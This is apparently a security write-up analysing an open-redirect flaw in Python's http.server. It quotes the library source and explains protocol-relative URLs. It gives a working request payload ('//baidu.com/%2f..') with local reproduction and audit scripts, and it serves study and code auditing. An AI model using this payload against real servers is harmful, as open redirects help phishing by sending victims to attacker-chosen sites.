Python http.server URL Redirect

Source code analysis

As is well known, Python offers a one-line way to start a web server:

python3 -m http.server port

Run this command in any directory to start a web file server for that directory. It uses the http.server module, which contains the following important classes:

HTTPServer: inherits from socketserver.TCPServer, which shows that an HTTP server is really a TCP server.
BaseHTTPRequestHandler: the handler that processes what arrives over the TCP connection. It parses the data read from the TCP stream according to the HTTP protocol and writes responses in HTTP format, but it does nothing with a request once it has been parsed, so it cannot be used directly. To write our own web application, we can inherit from this class and implement the do_XXX methods.
SimpleHTTPRequestHandler: inherits from BaseHTTPRequestHandler, takes the parsed request from the parent class, and returns the file at the requested path to the user, which amounts to a static file server.
CGIHTTPRequestHandler: inherits from SimpleHTTPRequestHandler and adds the ability to execute CGI scripts on top of the static file server.
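
As an illustration of the do_XXX convention described above, here is a minimal sketch of a handler that inherits from BaseHTTPRequestHandler. The names HelloHandler and fetch_once are hypothetical and exist only for this example. The helper serves exactly one request on an ephemeral local port so that the script finishes on its own.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class HelloHandler(BaseHTTPRequestHandler):
    """Hypothetical handler: answers every GET with a plain-text greeting."""

    def do_GET(self):
        # The parent class has already parsed the request line and headers;
        # self.path holds the raw request target.
        body = f"hello from {self.path}\n".encode("utf-8")
        self.send_response(200)
        self.send_header("Content-Type", "text/plain; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass  # keep the demo quiet


def fetch_once(path="/demo"):
    """Serve a single request on an ephemeral port; return (status, body)."""
    server = HTTPServer(("127.0.0.1", 0), HelloHandler)
    worker = threading.Thread(target=server.handle_request, daemon=True)
    worker.start()
    conn = http.client.HTTPConnection("127.0.0.1", server.server_port, timeout=5)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.read().decode("utf-8")
    finally:
        conn.close()
        worker.join(timeout=5)
        server.server_close()


if __name__ == "__main__":
    print(fetch_once())
```

A POST handler would follow the same pattern with a do_POST method.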

In short, they are related as follows:

+-----------+           +------------------------+
| TCPServer |           | BaseHTTPRequestHandler |
+-----------+           +------------------------+
      ^                             |
      |                             v
      |                +--------------------------+
      +----------------| SimpleHTTPRequestHandler |
      |                +--------------------------+
      |                             |
      |                             v
      |                 +-----------------------+
      +-----------------| CGIHTTPRequestHandler |
                        +-----------------------+

Let's take a look at the source code of SimpleHTTPRequestHandler:

class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):

    """Simple HTTP request handler with GET and HEAD commands.

    This serves files from the current directory and any of its
    subdirectories.  The MIME type for files is determined by
    calling the .guess_type() method.

    The GET and HEAD requests are identical except that the HEAD
    request omits the actual contents of the file.

    """

    server_version = "SimpleHTTP/" + __version__

    def __init__(self, *args, directory=None, **kwargs):
        if directory is None:
            directory = os.getcwd()
        self.directory = directory
        super().__init__(*args, **kwargs)

    def do_GET(self):
        """Serve a GET request."""
        f = self.send_head()
        if f:
            try:
                self.copyfile(f, self.wfile)
            finally:
                f.close()

    def do_HEAD(self):
        """Serve a HEAD request."""
        f = self.send_head()
        if f:
            f.close()

    def send_head(self):
        """Common code for GET and HEAD commands.

        This sends the response code and MIME headers.

        Return value is either a file object (which has to be copied
        to the outputfile by the caller unless the command was HEAD,
        and must be closed by the caller under all circumstances), or
        None, in which case the caller has nothing further to do.

        """
        path = self.translate_path(self.path)
        f = None
        if os.path.isdir(path):
            parts = urllib.parse.urlsplit(self.path)
            if not parts.path.endswith('/'):
                # redirect browser - doing basically what apache does
                self.send_response(HTTPStatus.MOVED_PERMANENTLY)
                new_parts = (parts[0], parts[1], parts[2] + '/',
                             parts[3], parts[4])
                new_url = urllib.parse.urlunsplit(new_parts)
                self.send_header("Location", new_url)
                self.end_headers()
                return None
            for index in "index.html", "index.htm":
                index = os.path.join(path, index)
                if os.path.exists(index):
                    path = index
                    break
            else:
                return self.list_directory(path)
        ctype = self.guess_type(path)
        try:
            f = open(path, 'rb')
        except OSError:
            self.send_error(HTTPStatus.NOT_FOUND, "File not found")
            return None

        try:
            fs = os.fstat(f.fileno())
            # Use browser cache if possible
            if ("If-Modified-Since" in self.headers
                    and "If-None-Match" not in self.headers):
                # compare If-Modified-Since and time of last file modification
                try:
                    ims = email.utils.parsedate_to_datetime(
                        self.headers["If-Modified-Since"])
                except (TypeError, IndexError, OverflowError, ValueError):
                    # ignore ill-formed values
                    pass
                else:
                    if ims.tzinfo is None:
                        # obsolete format with no timezone, cf.
                        # https://tools.ietf.org/html/rfc7231#section-7.1.1.1
                        ims = ims.replace(tzinfo=datetime.timezone.utc)
                    if ims.tzinfo is datetime.timezone.utc:
                        # compare to UTC datetime of last modification
                        last_modif = datetime.datetime.fromtimestamp(
                            fs.st_mtime, datetime.timezone.utc)
                        # remove microseconds, like in If-Modified-Since
                        last_modif = last_modif.replace(microsecond=0)

                        if last_modif <= ims:
                            self.send_response(HTTPStatus.NOT_MODIFIED)
                            self.end_headers()
                            f.close()
                            return None

            self.send_response(HTTPStatus.OK)
            self.send_header("Content-type", ctype)
            self.send_header("Content-Length", str(fs[6]))
            self.send_header("Last-Modified",
                self.date_time_string(fs.st_mtime))
            self.end_headers()
            return f
        except:
            f.close()
            raise
...

We skip the earlier HTTP parsing stage here. A GET request is dispatched to the do_GET() method, and do_GET() calls send_head().

In send_head(), self.translate_path(self.path) is called to normalize the request path and obtain the file the user is actually requesting. If that path is an existing directory, execution enters the first if statement. If the requested path does not end with /, it enters the second if statement, which performs an HTTP redirect. This redirect is the key to the vulnerability discussed here.
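
The redirect step can be isolated into a small function. This is a sketch that mirrors the urlsplit/urlunsplit lines quoted above. It assumes the requested path has already been found to be an existing directory, and the name directory_redirect_target is made up for this example.

```python
from urllib.parse import urlsplit, urlunsplit


def directory_redirect_target(request_path):
    """Return the Location value for a directory request, or None.

    Assumes the path was already resolved to an existing directory.
    None means the path ends with '/' and no redirect is sent.
    """
    parts = urlsplit(request_path)
    if parts.path.endswith("/"):
        return None
    # Same tuple the handler builds: only the path component gains a '/'.
    new_parts = (parts[0], parts[1], parts[2] + "/", parts[3], parts[4])
    return urlunsplit(new_parts)


print(directory_redirect_target("/docs"))         # /docs/
print(directory_redirect_target("/docs?sort=1"))  # /docs/?sort=1
print(directory_redirect_target("/docs/"))        # None
```

Note that the scheme and netloc components of the request target are passed through unchanged, which matters in the next section.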

Vulnerability reproduction

In mainstream browsers such as Chrome and Firefox, a URL that starts with //domain is treated as a protocol-relative URL: the browser keeps the scheme of the current page and takes what follows // as the host. For example, if a response from http://example.com/ redirects to //baidu.com/, the browser goes to http://baidu.com/ rather than to a //baidu.com/ directory on example.com. So if the request we send is GET //baidu.com HTTP/1.0\r\n\r\n, the server redirects to //baidu.com/, and an arbitrary URL redirection (open redirect) vulnerability results.
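
The same interpretation can be observed with urllib.parse. The sketch below uses urljoin as a stand-in for how a browser resolves a Location value against the current page, which is an approximation and not browser code. The name resolve_location is hypothetical.

```python
from urllib.parse import urljoin, urlsplit


def resolve_location(current_url, location):
    """Approximate how a client resolves a Location header value."""
    return urljoin(current_url, location)


# urlsplit() reads the text after a leading '//' as the host, not as a path.
parts = urlsplit("//baidu.com")
print(parts.netloc)      # baidu.com
print(repr(parts.path))  # ''

# A protocol-relative Location leaves the current site ...
print(resolve_location("http://example.com/", "//baidu.com/"))
# http://baidu.com/

# ... while a single leading slash stays on it.
print(resolve_location("http://example.com/", "/baidu.com/"))
# http://example.com/baidu.com/
```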

However, because the directory baidu.com does not exist, that request fails the os.path.isdir(path) check, so we still need to get past this if statement. The bypass is simple: since baidu.com does not exist, we append an encoded /.. so that the normalized path goes back up one directory level to a directory that does exist:

GET //baidu.com/%2f.. HTTP/1.0\r\n\r\n
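
To see why this payload passes the directory check, the sketch below imitates the normalization done by translate_path() (strip query and fragment, unquote, posixpath.normpath, drop empty and dot components). It is a simplified approximation, not the library code, and served_components is a made-up name. An empty result means the request resolves to the served root directory itself, which always exists.

```python
import posixpath
from urllib.parse import unquote, urlsplit


def served_components(request_path):
    """Approximate which path components end up under the served directory."""
    path = request_path.split("?", 1)[0].split("#", 1)[0]
    path = posixpath.normpath(unquote(path))
    return [w for w in path.split("/") if w and w not in (".", "..")]


# Plain payload: looks for a directory named baidu.com, which does not exist.
print(served_components("//baidu.com"))        # ['baidu.com']

# With the encoded '/..' the path collapses to the served root directory.
print(served_components("//baidu.com/%2f.."))  # []

# The redirect branch still parses the raw request target, so the host is
# kept and the path does not end with '/'.
parts = urlsplit("//baidu.com/%2f..")
print(parts.netloc)  # baidu.com
print(parts.path)    # /%2f..
```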

Let's run a simple test: start an http.server service in a local test directory.

Then visit http://127.0.0.1:1234//baidu.com%2f in the browser. The browser is redirected to http://www.baidu.com/search/error.html.
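
The test can also be scripted without a browser. The following is a rough sketch under several assumptions: it serves an empty temporary directory on an ephemeral port instead of port 1234, sends the GET //baidu.com/%2f.. request shown earlier, and only reports the redirect without following it. QuietHandler and probe_redirect are hypothetical names. The Location value depends on the Python version: to my understanding, newer CPython releases collapse a leading // in the request path while parsing the request, in which case the header should start with a single slash and the redirect stays on the local server.

```python
import functools
import http.client
import tempfile
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler


class QuietHandler(SimpleHTTPRequestHandler):
    """SimpleHTTPRequestHandler with request logging silenced."""

    def log_message(self, format, *args):
        pass


def probe_redirect(request_target="//baidu.com/%2f.."):
    """Send one raw GET to a throwaway server; return (status, Location)."""
    with tempfile.TemporaryDirectory() as root:
        handler = functools.partial(QuietHandler, directory=root)
        server = HTTPServer(("127.0.0.1", 0), handler)
        worker = threading.Thread(target=server.handle_request, daemon=True)
        worker.start()
        conn = http.client.HTTPConnection(
            "127.0.0.1", server.server_port, timeout=5)
        try:
            # http.client sends the target as given and never follows redirects.
            conn.request("GET", request_target)
            resp = conn.getresponse()
            resp.read()
            return resp.status, resp.getheader("Location")
        finally:
            conn.close()
            worker.join(timeout=5)
            server.server_close()


if __name__ == "__main__":
    status, location = probe_redirect()
    print(status, location)
    if location and location.startswith("//"):
        print("Location is protocol-relative: open redirect reproduced")
    else:
        print("Location stays on this host: this version looks patched")
```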

Vulnerability impact

Although this vulnerability is in the Python standard library, people rarely run python -m http.server directly in a production environment. Still, when auditing similar code, it is worth paying attention to request handling and checking whether any class inherits from SimpleHTTPRequestHandler and implements methods such as do_GET and do_POST. If so, analyze further to see whether the redirect can be exploited.
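
A first pass of such an audit can be automated. The sketch below uses the ast module to list classes that directly name SimpleHTTPRequestHandler as a base, together with the do_* methods they define. The function name find_handler_subclasses and the SAMPLE source are invented for illustration, and the check is deliberately shallow: it does not resolve import aliases or indirect inheritance.

```python
import ast

TARGET = "SimpleHTTPRequestHandler"


def find_handler_subclasses(source):
    """Map class name -> do_* methods for direct subclasses of TARGET."""
    found = {}
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.ClassDef):
            continue
        base_names = set()
        for base in node.bases:
            if isinstance(base, ast.Name):         # class A(SimpleHTTPRequestHandler)
                base_names.add(base.id)
            elif isinstance(base, ast.Attribute):  # class A(http.server.Simple...)
                base_names.add(base.attr)
        if TARGET in base_names:
            found[node.name] = [
                item.name
                for item in node.body
                if isinstance(item, ast.FunctionDef)
                and item.name.startswith("do_")
            ]
    return found


SAMPLE = '''
import http.server

class FileApp(http.server.SimpleHTTPRequestHandler):
    def do_POST(self):
        pass

class Unrelated:
    pass
'''

print(find_handler_subclasses(SAMPLE))  # {'FileApp': ['do_POST']}
```

Any class it reports inherits send_head() unless it overrides it, so it is a candidate for the manual analysis described above.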